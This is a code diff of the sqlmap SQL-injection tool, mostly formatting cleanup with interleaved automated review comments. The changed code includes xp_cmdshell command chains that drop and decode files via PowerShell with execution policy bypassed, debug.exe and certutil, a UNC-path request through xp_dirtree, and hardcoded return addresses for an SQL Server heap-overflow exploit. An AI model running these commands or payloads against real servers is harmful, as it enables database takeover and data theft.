8719, - 'sum': 8721, - 'minus': 8722, - 'lowast': 8727, - 'radic': 8730, - 'prop': 8733, - 'infin': 8734, - 'ang': 8736, - 'and': 8743, - 'or': 8744, - 'cap': 8745, - 'cup': 8746, - 'int': 8747, - 'there4': 8756, - 'sim': 8764, - 'cong': 8773, - 'asymp': 8776, - 'ne': 8800, - 'equiv': 8801, - 'le': 8804, - 'ge': 8805, - 'sub': 8834, - 'sup': 8835, - 'nsub': 8836, - 'sube': 8838, - 'supe': 8839, - 'oplus': 8853, - 'otimes': 8855, - 'perp': 8869, - 'sdot': 8901, - 'lceil': 8968, - 'rceil': 8969, - 
'lfloor': 8970, - 'rfloor': 8971, - 'lang': 9001, - 'rang': 9002, - 'loz': 9674, - 'spades': 9824, - 'clubs': 9827, - 'hearts': 9829, - 'diams': 9830, + "quot": 34, + "amp": 38, + "lt": 60, + "gt": 62, + "nbsp": 160, + "iexcl": 161, + "cent": 162, + "pound": 163, + "curren": 164, + "yen": 165, + "brvbar": 166, + "sect": 167, + "uml": 168, + "copy": 169, + "ordf": 170, + "laquo": 171, + "not": 172, + "shy": 173, + "reg": 174, + "macr": 175, + "deg": 176, + "plusmn": 177, + "sup2": 178, + "sup3": 179, + "acute": 180, + "micro": 181, + "para": 182, + "middot": 183, + "cedil": 184, + "sup1": 185, + "ordm": 186, + "raquo": 187, + "frac14": 188, + "frac12": 189, + "frac34": 190, + "iquest": 191, + "Agrave": 192, + "Aacute": 193, + "Acirc": 194, + "Atilde": 195, + "Auml": 196, + "Aring": 197, + "AElig": 198, + "Ccedil": 199, + "Egrave": 200, + "Eacute": 201, + "Ecirc": 202, + "Euml": 203, + "Igrave": 204, + "Iacute": 205, + "Icirc": 206, + "Iuml": 207, + "ETH": 208, + "Ntilde": 209, + "Ograve": 210, + "Oacute": 211, + "Ocirc": 212, + "Otilde": 213, + "Ouml": 214, + "times": 215, + "Oslash": 216, + "Ugrave": 217, + "Uacute": 218, + "Ucirc": 219, + "Uuml": 220, + "Yacute": 221, + "THORN": 222, + "szlig": 223, + "agrave": 224, + "aacute": 225, + "acirc": 226, + "atilde": 227, + "auml": 228, + "aring": 229, + "aelig": 230, + "ccedil": 231, + "egrave": 232, + "eacute": 233, + "ecirc": 234, + "euml": 235, + "igrave": 236, + "iacute": 237, + "icirc": 238, + "iuml": 239, + "eth": 240, + "ntilde": 241, + "ograve": 242, + "oacute": 243, + "ocirc": 244, + "otilde": 245, + "ouml": 246, + "divide": 247, + "oslash": 248, + "ugrave": 249, + "uacute": 250, + "ucirc": 251, + "uuml": 252, + "yacute": 253, + "thorn": 254, + "yuml": 255, + "OElig": 338, + "oelig": 339, + "Scaron": 352, + "fnof": 402, + "scaron": 353, + "Yuml": 376, + "circ": 710, + "tilde": 732, + "Alpha": 913, + "Beta": 914, + "Gamma": 915, + "Delta": 916, + "Epsilon": 917, + "Zeta": 918, + "Eta": 919, + "Theta": 920, + 
"Iota": 921, + "Kappa": 922, + "Lambda": 923, + "Mu": 924, + "Nu": 925, + "Xi": 926, + "Omicron": 927, + "Pi": 928, + "Rho": 929, + "Sigma": 931, + "Tau": 932, + "Upsilon": 933, + "Phi": 934, + "Chi": 935, + "Psi": 936, + "Omega": 937, + "alpha": 945, + "beta": 946, + "gamma": 947, + "delta": 948, + "epsilon": 949, + "zeta": 950, + "eta": 951, + "theta": 952, + "iota": 953, + "kappa": 954, + "lambda": 955, + "mu": 956, + "nu": 957, + "xi": 958, + "omicron": 959, + "pi": 960, + "rho": 961, + "sigmaf": 962, + "sigma": 963, + "tau": 964, + "upsilon": 965, + "phi": 966, + "chi": 967, + "psi": 968, + "omega": 969, + "thetasym": 977, + "upsih": 978, + "piv": 982, + "bull": 8226, + "hellip": 8230, + "prime": 8242, + "Prime": 8243, + "oline": 8254, + "frasl": 8260, + "ensp": 8194, + "emsp": 8195, + "thinsp": 8201, + "zwnj": 8204, + "zwj": 8205, + "lrm": 8206, + "rlm": 8207, + "ndash": 8211, + "mdash": 8212, + "lsquo": 8216, + "rsquo": 8217, + "sbquo": 8218, + "ldquo": 8220, + "rdquo": 8221, + "bdquo": 8222, + "dagger": 8224, + "Dagger": 8225, + "permil": 8240, + "lsaquo": 8249, + "rsaquo": 8250, + "euro": 8364, + "weierp": 8472, + "image": 8465, + "real": 8476, + "trade": 8482, + "alefsym": 8501, + "larr": 8592, + "uarr": 8593, + "rarr": 8594, + "darr": 8595, + "harr": 8596, + "crarr": 8629, + "lArr": 8656, + "uArr": 8657, + "rArr": 8658, + "dArr": 8659, + "hArr": 8660, + "forall": 8704, + "part": 8706, + "exist": 8707, + "empty": 8709, + "nabla": 8711, + "isin": 8712, + "notin": 8713, + "ni": 8715, + "prod": 8719, + "sum": 8721, + "minus": 8722, + "lowast": 8727, + "radic": 8730, + "prop": 8733, + "infin": 8734, + "ang": 8736, + "and": 8743, + "or": 8744, + "cap": 8745, + "cup": 8746, + "int": 8747, + "there4": 8756, + "sim": 8764, + "cong": 8773, + "asymp": 8776, + "ne": 8800, + "equiv": 8801, + "le": 8804, + "ge": 8805, + "sub": 8834, + "sup": 8835, + "nsub": 8836, + "sube": 8838, + "supe": 8839, + "oplus": 8853, + "otimes": 8855, + "perp": 8869, + "sdot": 8901, + 
"lceil": 8968,
+ "rceil": 8969,
+ "lfloor": 8970,
+ "rfloor": 8971,
+ "lang": 9001,
+ "rang": 9002,
+ "loz": 9674,
+ "spades": 9824,
+ "clubs": 9827,
+ "hearts": 9829,
+ "diams": 9830,
 }
diff --git a/lib/utils/progress.py b/lib/utils/progress.py
index 4d7c023a4cf..e1cb4ca668b 100644
--- a/lib/utils/progress.py
+++ b/lib/utils/progress.py
@@ -62,8 +62,7 @@ def update(self, newAmount=0):
 elif numHashes == allFull:
 self._progBar = "[%s]" % ("=" * allFull)
 else:
- self._progBar = "[%s>%s]" % ("=" * (numHashes - 1),
- " " * (allFull - numHashes))
+ self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes))
 # Add the percentage at the beginning of the progress bar
 percentString = getUnicode(percentDone) + "%"
diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py
index 21249997bfb..e9f413c6c8a 100644
--- a/lib/utils/versioncheck.py
+++ b/lib/utils/versioncheck.py
@@ -20,4 +20,4 @@
 errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions))
 errMsg += "most likely because current version of Python has been "
 errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')"
- exit(errMsg)
\ No newline at end of file
+ exit(errMsg)
diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py
index 34076c7ec77..98338863b6b 100644
--- a/lib/utils/xrange.py
+++ b/lib/utils/xrange.py
@@ -69,7 +69,7 @@ def __getitem__(self, index):
 if isinstance(index, slice):
 start, stop, step = index.indices(self._len())
 return xrange(self._index(start),
- self._index(stop), step*self.step)
+ self._index(stop), step * self.step)
 elif isinstance(index, (int, long)):
 if index < 0:
 fixed_index = index + self._len()
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index 4b01d076de9..5c6896dc598 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -48,11 +48,12 @@ def _sysTablesCheck(self):
 # Microsoft Access table reference updated on 01/2010
 sysTables = {
- "97": ("MSysModules2", "MSysAccessObjects"),
- "2000" : ("!MSysModules2", "MSysAccessObjects"),
- "2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
- "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
- }
+ "97": ("MSysModules2", "MSysAccessObjects"),
+ "2000": ("!MSysModules2", "MSysAccessObjects"),
+ "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"),
+ "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"),
+ }
+
 # MSysAccessXML is not a reliable system table because it doesn't always exist
 # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty")
diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py
index d3dfef3068a..7bd4b86d420 100644
--- a/plugins/dbms/db2/connector.py
+++ b/plugins/dbms/db2/connector.py
@@ -37,7 +37,6 @@ def connect(self):
 except ibm_db_dbi.OperationalError, msg:
 raise SqlmapConnectionException(msg)
- self.initCursor()
 self.printConnected()
diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py
index deb2c22bd38..ed532a57b03 100644
--- a/plugins/dbms/db2/fingerprint.py
+++ b/plugins/dbms/db2/fingerprint.py
@@ -64,9 +64,9 @@ def getFingerprint(self):
 value += DBMS.DB2
 return value
- actVer = Format.getDbms()
- blank = " " * 15
- value += "active fingerprint: %s" % actVer
+ actVer = Format.getDbms()
+ blank = " " * 15
+ value += "active fingerprint: %s" % actVer
 if kb.bannerFp:
 banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
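Review bot: The db2 `connect()` hunk removes the only `self.initCursor()` call visible between the `except` block and `self.printConnected()`, and the informix `connect()` hunk in the following file section makes the identical removal. Unless another `initCursor()` call survives in lines not shown here, `self.cursor` is presumably never created for these two backends and the first `self.cursor.execute(...)` would fail. If a base-class method is now expected to create the cursor, a one-line comment at the removal site would spare the next reader the search, e.g. `# cursor is created by the generic connector` (wording to be confirmed against the base class). The enclosing `connect()` begins outside the hunk.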
@@ -127,12 +127,14 @@ def checkDbmsOs(self, detailed=False):
 infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
 if result:
- versions = { "2003": ("5.2", (2, 1)),
+ versions = {
+ "2003": ("5.2", (2, 1)),
 "2008": ("7.0", (1,)),
 "2000": ("5.0", (4, 3, 2, 1)),
 "7": ("6.1", (1, 0)),
 "XP": ("5.1", (2, 1)),
- "NT": ("4.0", (6, 5, 4, 3, 2, 1)) }
+ "NT": ("4.0", (6, 5, 4, 3, 2, 1))
+ }
 # Get back-end DBMS underlying operating system version
 for version, data in versions.items():
diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py
index df874f9c0b1..f6b88cb0048 100644
--- a/plugins/dbms/firebird/connector.py
+++ b/plugins/dbms/firebird/connector.py
@@ -39,8 +39,8 @@ def connect(self):
 self.checkFileDb()
 try:
- self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \
- user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html
+ # Reference: http://www.daniweb.com/forums/thread248499.html
+ self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8")
 except kinterbasdb.OperationalError, msg:
 raise SqlmapConnectionException(msg[1])
diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py
index ba350205e43..f63a57f49ce 100644
--- a/plugins/dbms/firebird/fingerprint.py
+++ b/plugins/dbms/firebird/fingerprint.py
@@ -68,12 +68,12 @@ def getFingerprint(self):
 def _sysTablesCheck(self):
 retVal = None
 table = (
- ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
- ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
- ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
- ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
- # TODO: add test for Firebird 2.5
- )
+ ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)),
+ ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
+ ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
+ ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
+ # TODO: add test for Firebird 2.5
+ )
 for i in xrange(len(table)):
 version, checks = table[i]
diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py
index 77e041e0caf..ee605409f27 100644
--- a/plugins/dbms/hsqldb/connector.py
+++ b/plugins/dbms/hsqldb/connector.py
@@ -46,11 +46,8 @@ def connect(self):
 try:
 driver = 'org.hsqldb.jdbc.JDBCDriver'
- connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
- self.connector = jaydebeapi.connect(driver,
- connection_string,
- str(self.user),
- str(self.password))
+ connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
+ self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password))
 except Exception, msg:
 raise SqlmapConnectionException(msg[0])
@@ -70,7 +67,7 @@ def execute(self, query):
 try:
 self.cursor.execute(query)
 retVal = True
- except Exception, msg: #todo fix with specific error
+ except Exception, msg: # TODO: fix with specific error
 logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
 self.connector.commit()
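Review bot: The reworded trailing comment on `connection_string` shows the alternative `hsql://%s/%s` URL but still does not say why the in-memory `jdbc:hsqldb:mem:.` URL is used, so a reader cannot tell whether `self.hostname` and `self.db` being unused by this connector is intentional. A short explanatory comment on the line above would settle it, e.g. `# NOTE: direct connection opens an in-memory HSQLDB instance; hostname/db are not used here (TODO: confirm intent)`. The enclosing `connect()` begins outside the hunk.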
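Review bot: In the `execute()` hunk the broad `except Exception, msg:` is followed by `msg[1]` in the log call, so any exception whose `args` has fewer than two items turns a warning into an uncaught IndexError, and the `connect()` hunk above indexes `msg[0]` for the same driver, so the two sites are not even consistent. Guard the index until the exception type is narrowed, e.g. `logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % (msg.args[1] if len(msg.args) > 1 else msg))`. The TODO the commit reformats already names the real fix (catch the specific driver error). The enclosing `execute()` continues outside the hunk.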
diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py
index 022e04e390d..d4c5354ea42 100644
--- a/plugins/dbms/informix/connector.py
+++ b/plugins/dbms/informix/connector.py
@@ -37,7 +37,6 @@ def connect(self):
 except ibm_db_dbi.OperationalError, msg:
 raise SqlmapConnectionException(msg)
- self.initCursor()
 self.printConnected()
diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py
index 62b06283a60..e3cbf0d6969 100644
--- a/plugins/dbms/informix/syntax.py
+++ b/plugins/dbms/informix/syntax.py
@@ -41,4 +41,4 @@ def escaper(value):
 for _ in excluded.items():
 retVal = retVal.replace(_[1], _[0])
- return retVal
\ No newline at end of file
+ return retVal
diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py
index 79a2c958708..c0442f7be3e 100644
--- a/plugins/dbms/maxdb/enumeration.py
+++ b/plugins/dbms/maxdb/enumeration.py
@@ -108,7 +108,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod
 conf.db = self.getCurrentDb()
 elif conf.db is not None:
- if ',' in conf.db:
+ if ',' in conf.db:
 errMsg = "only one database name is allowed when enumerating "
 errMsg += "the tables' columns"
 raise SqlmapMissingMandatoryOptionException(errMsg)
@@ -184,9 +184,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod
 rootQuery = queries[DBMS.MAXDB].columns
 for tbl in tblList:
- if conf.db is not None and len(kb.data.cachedColumns) > 0 \
- and conf.db in kb.data.cachedColumns and tbl in \
- kb.data.cachedColumns[conf.db]:
+ if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]:
 infoMsg = "fetched tables' columns on "
 infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
 logger.info(infoMsg)
diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py
index c0eec311b2e..7b89d60b4c1 100644
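Review bot: The joined condition in the second maxdb `getColumns()` hunk keeps `len(kb.data.cachedColumns) > 0` next to `conf.db in kb.data.cachedColumns`, and the length test is implied by the membership test, so now that the line is one long expression the redundancy stands out. Since `kb.data.cachedColumns` is assigned a plain `{}` elsewhere in this commit (mssqlserver `searchColumn()`), the whole test can be written as `if conf.db is not None and tbl in kb.data.cachedColumns.get(conf.db, {}):`, which is shorter and avoids the double lookup. `getColumns()` begins and ends outside the hunk.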
--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -368,16 +368,16 @@ def searchColumn(self):
 if foundTbl not in dbs[db]:
 dbs[db][foundTbl] = {}
- if colConsider == "1":
+ if colConsider == '1':
 conf.db = db
 conf.tbl = foundTbl
 conf.col = column
 self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
- if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\
- and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
+ if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
 dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
+ kb.data.cachedColumns = {}
 else:
 dbs[db][foundTbl][column] = None
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index b8aeaaee071..c94f70f4fd1 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -73,10 +73,13 @@ def _updateDestChunk(self, fileContent, tmpPath):
 logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
- commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr)
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "cd \"%s\"" % tmpPath,
+ "debug < %s" % randScr,
+ "del /F /Q %s" % randScr
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 return chunkName
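Review bot: The added `kb.data.cachedColumns = {}` in `searchColumn()` discards the shared column cache as a side effect, with no comment saying why, and the collapsed rendering does not show whether it sits inside the `if db in kb.data.cachedColumns ...` branch or after it. If it is inside the branch, a miss leaves the previous iteration's entries in place, and the next `self.getColumns(...)` call could presumably be answered from that stale cache instead of fetching for the new `column` filter; if the reset is meant to force a fresh fetch each iteration it belongs unconditionally right after the `getColumns()` call. Either way, a comment such as `# drop the cache so the next getColumns() re-fetches for the next (db, tbl, column) filter` would make the intent explicit. `searchColumn()` begins and ends outside the hunk.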
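Review bot: `" & ".join(command for command in commands)` in the new `self.execCmd(...)` line of `_updateDestChunk()` wraps a tuple of strings in a generator that adds nothing; `" & ".join(commands)` is the idiomatic form and reads better now that `commands` is laid out one entry per line. The same pattern is repeated in the `_stackedWriteFilePS`, `_stackedWriteFileDebugExe` (both hunks), `_stackedWriteFileVbs` and `_stackedWriteFileCertutilExe` hunks that follow. `_updateDestChunk()` begins outside the hunk.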
@@ -195,12 +198,13 @@ def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
 logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
- commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
- "del /F /Q \"%s\"" % encodedBase64FilePath,
- "del /F /Q \"%s\"" % randPSScriptPath)
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
+ "del /F /Q \"%s\"" % encodedBase64FilePath,
+ "del /F /Q \"%s\"" % randPSScriptPath
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
 infoMsg = "using debug.exe to write the %s " % fileType
@@ -219,10 +223,13 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp
 debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
 logger.debug(debugMsg)
- commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "cd \"%s\"" % tmpPath,
+ "ren %s %s" % (chunkName, dFileName),
+ "move /Y %s %s" % (dFileName, dFile)
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 else:
 debugMsg = "the file is larger than %d bytes. " % debugSize
 debugMsg += "sqlmap will split it into chunks locally, upload "
@@ -244,17 +251,22 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp
 debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
 logger.debug(debugMsg)
- commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName)
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "cd \"%s\"" % tmpPath,
+ copyCmd,
+ "del /F /Q %s" % chunkName
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
- commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "cd \"%s\"" % tmpPath,
+ "move /Y %s %s" % (dFileName, dFile)
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
 infoMsg = "using a custom visual basic script to write the "
@@ -330,12 +342,14 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
 self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
- commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs,
- "del /F /Q %s" % randVbs,
- "del /F /Q %s" % randFile)
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "cd \"%s\"" % tmpPath,
+ "cscript //nologo %s" % randVbs,
+ "del /F /Q %s" % randVbs,
+ "del /F /Q %s" % randFile
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
 infoMsg = "using certutil.exe to write the %s " % fileType
@@ -349,7 +363,7 @@ def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, file
 encodedFileContent = base64encode(wFileContent)
- splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
+ splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
 logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
@@ -357,11 +371,13 @@ def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, file
 logger.debug("decoding the file to %s.." % dFile)
- commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
- "del /F /Q %s" % randFile)
- complComm = " & ".join(command for command in commands)
+ commands = (
+ "cd \"%s\"" % tmpPath,
+ "certutil -f -decode %s %s" % (randFile, dFile),
+ "del /F /Q %s" % randFile
+ )
- self.execCmd(complComm)
+ self.execCmd(" & ".join(command for command in commands))
 def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
 # NOTE: this is needed here because we use xp_cmdshell extended
diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py
index 67992416c6b..354b05b4807 100644
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -88,12 +88,14 @@ def checkDbms(self):
 infoMsg = "confirming %s" % DBMS.MSSQL
 logger.info(infoMsg)
- for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \
- ("2005", "XACT_STATE()=XACT_STATE()"), \
- ("2008", "SYSDATETIME()=SYSDATETIME()"), \
- ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \
- ("2014", "CHARINDEX('12.0.2000',@@version)>0"), \
- ("2016", "ISJSON(NULL) IS NULL")):
+ for version, check in (
+ ("2000", "HOST_NAME()=HOST_NAME()"),
+ ("2005", "XACT_STATE()=XACT_STATE()"),
+ ("2008", "SYSDATETIME()=SYSDATETIME()"),
+ ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
+ ("2014", "CHARINDEX('12.0.2000',@@version)>0"),
+ ("2016", "ISJSON(NULL) IS NULL")
+ ):
 result = inject.checkBooleanExpression(check)
 if result:
@@ -136,14 +138,16 @@ def checkDbmsOs(self, detailed=False):
 # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
 # http://en.wikipedia.org/wiki/Windows_NT#Releases
- versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
- "2000": ("5.0", (4, 3, 2, 1)),
- "XP": ("5.1", (3, 2, 1)),
- "2003": ("5.2", (2, 1)),
- "Vista or 2008": ("6.0", (2, 1)),
- "7 or 2008 R2": ("6.1", (1, 0)),
- "8 or 2012": ("6.2", (0,)),
- "8.1 or 2012 R2": ("6.3", (0,)) }
+ versions = {
+ "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
+ "2000": ("5.0", (4, 3, 2, 1)),
+ "XP": ("5.1", (3, 2, 1)),
+ "2003": ("5.2", (2, 1)),
+ "Vista or 2008": ("6.0", (2, 1)),
+ "7 or 2008 R2": ("6.1", (1, 0)),
+ "8 or 2012": ("6.2", (0,)),
+ "8.1 or 2012 R2": ("6.3", (0,))
+ }
 # Get back-end DBMS underlying operating system version
 for version, data in versions.items():
diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py
index c3a3381e2e5..a728a74da9b 100644
--- a/plugins/dbms/mssqlserver/takeover.py
+++ b/plugins/dbms/mssqlserver/takeover.py
@@ -20,7 +20,7 @@ def __init__(self):
 GenericTakeover.__init__(self)
 def uncPathRequest(self):
- #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
+ # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
 inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
 def spHeapOverflow(self):
@@ -31,21 +31,22 @@ def spHeapOverflow(self): """ returns = { - # 2003 Service Pack 0 - "2003-0": (""), + # 2003 Service Pack 0 + "2003-0": (""), - # 2003 Service Pack 1 - "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), + # 2003 Service Pack 1 + "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"), - # 2003 Service Pack 2 updated at 12/2008 - #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), + # 2003 Service Pack 2 updated at 12/2008 + # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", 